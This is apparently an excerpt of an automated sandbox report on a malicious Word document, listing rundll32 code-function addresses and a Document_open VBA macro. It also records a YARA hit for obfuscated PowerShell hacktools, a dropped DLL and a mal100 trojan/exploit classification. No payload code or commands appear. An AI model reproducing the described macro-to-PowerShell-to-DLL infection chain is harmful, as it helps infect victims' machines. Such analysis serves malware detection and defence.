                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025878F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024839D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00253FE7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002567E9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024D7EB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002563C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00249FDC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00251BDF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EB41F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EEE78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E2C63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F3895
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E568E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F42DA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EC0C6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F02C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E8736
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F4B41
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E7B63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F63C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F7A0F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F340A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E9A37
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E4A35
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E2A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EE05A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EEA4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EF444
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F687F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F5A61
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F889D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E1280
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E48BD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E80BA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E60B9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001FA0AF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E62A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F8ADC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E96CD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F20C5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E1CFA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F26F5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E88E5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F12E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F7F1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F5D1D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F8D1C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F511B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F2B16
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EB112
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F0F0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F7D03
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E153C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EBB3A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EF536
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F0D33
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EB75F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E6754
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F2349
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F8F49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F9B45
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E8F78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E5B79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EE377
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F1773
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EC769
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F0B68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E6D9F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E839D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E7998
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F878F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EF98C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F9586
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F6DB9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F61B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E17AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F73AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E69A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F1BDF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E9FDC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F71EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001ED7EB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F67E9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F3FE7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F31E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019B41F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019EE78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00192C63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A3895
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019568E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A42DA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A02C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019C0C6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00198736
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A4B41
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00197B63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A63C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A340A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A7A0F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00192A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00194A35
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00199A37
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019E05A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019EA4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019F444
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A687F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A5A61
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A889D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00191280
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001960B9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001980BA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001948BD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001AA0AF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001962A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A8ADC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001996CD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A20C5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00191CFA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A26F5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A12E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001988E5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A511B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A7F1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A8D1C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A5D1D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019B112
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A2B16
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A0F0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A7D03
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019BB3A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019153C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A0D33
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019F536
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019B75F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00196754
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A2349
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A8F49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A9B45
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00195B79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00198F78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A1773
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019E377
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019C769
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A0B68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00197998
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019839D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00196D9F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A878F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019F98C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A9586
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A61B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A6DB9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001917AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A73AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001969A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A1BDF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00199FDC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019D7EB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A67E9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A71EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A31E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001A3FE7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023B41F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00232C63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023EE78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023568E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00243895
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023C0C6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002402C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002442DA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00238736
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00237B63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00244B41
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002463C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00232A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00239A37
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00234A35
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00247A0F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0024340A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00245A61
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0024687F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023F444
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023EA4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023E05A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002362A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0024A0AF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002380BA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002360B9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002348BD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00231280
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0024889D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002388E5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002412E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002426F5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00231CFA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002420C5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002396CD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00248ADC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023F536
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00240D33
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023BB3A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023153C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00247D03
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00240F0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023B112
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00242B16
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00248D1C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00245D1D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00247F1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0024511B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023C769
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00240B68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023E377
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00241773
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00235B79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00238F78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00249B45
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00248F49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00242349
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00236754
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023B75F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002369A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002473AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002317AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002461B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00246DB9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00249586
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0024878F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023F98C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00237998
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00236D9F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023839D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00243FE7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002431E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023D7EB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002471EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002467E9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00241BDF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00239FDC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023B41F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00232C63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00245A61
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002360B9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00231CFA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002402C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00238736
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023153C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00247D03
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00242B16
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00248D1C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023C769
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023E377
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00235B79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00244B41
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00242349
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002431E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00239FDC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00232A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00239A37
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00234A35
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00247A0F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0024340A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023EE78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0024687F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023F444
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023EA4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023E05A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002362A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0024A0AF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002380BA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002348BD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00231280
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023568E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00243895
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0024889D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002388E5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002412E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002426F5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002420C5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023C0C6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002396CD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00248ADC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002442DA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023F536
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00240D33
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023BB3A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00240F0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023B112
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00245D1D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00247F1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0024511B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00237B63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00240B68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00241773
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00238F78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00249B45
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00248F49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00236754
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023B75F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002369A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002473AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002317AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002461B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00246DB9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00249586
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0024878F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023F98C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00237998
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00236D9F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023839D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00243FE7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023D7EB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002471EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002467E9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002463C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00241BDF
                    Source: pack 2254794.docOLE, VBA macro line: Private Sub Document_open()
                    Source: VBA code instrumentationOLE, VBA macro: Module Wm_t404p8v_, Function Document_open
                    Source: pack 2254794.docOLE indicator, VBA macros: true
                    Source: 00000005.00000002.2096095535.0000000000296000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                    Source: 00000005.00000002.2096289799.0000000001BD6000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                    Source: O_5Z.dll.5.drStatic PE information: Section: .rsrc ZLIB complexity 0.994955920298
                    Source: rundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                    Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@18/8@1/2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00231C88 CreateToolhelp32Snapshot,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002D70 SysAllocString,CoCreateInstance,PropVariantClear,SysFreeString,SysFreeString,
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$ck 2254794.docJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD0B6.tmpJump to behavior
                    Source: pack 2254794.docOLE indicator, Word Document stream: true
                    Source: pack 2254794.docOLE document summary: title field not present or empty
                    Source: pack 2254794.docOLE document summary: edited time not present or 0
                    Source: C:\Windows\System32\msg.exeConsole Write: ............K........................... ...............................x...............#...............................h.......5kU.............
                    Source: C:\Windows\System32\msg.exeConsole Write: ............K...@...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K........t.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................p.j....................................}..v.....o......0...............................@...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................p.j..... ..............................}..v....Xp......0.................t.............@...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................ip.j....................................}..v.....}......0...............................@...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................ip.j......t.............................}..v.....}......0...............H.t.............@...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#................p.j....................................}..v....X.......0...............................@...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#................p.j..... ..............................}..v............0.................t.............@...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'................M.j....E...............................}..v....P&......0.................t.............@...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....+................M.j....E...............................}..v.....d......0.................t.............@...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
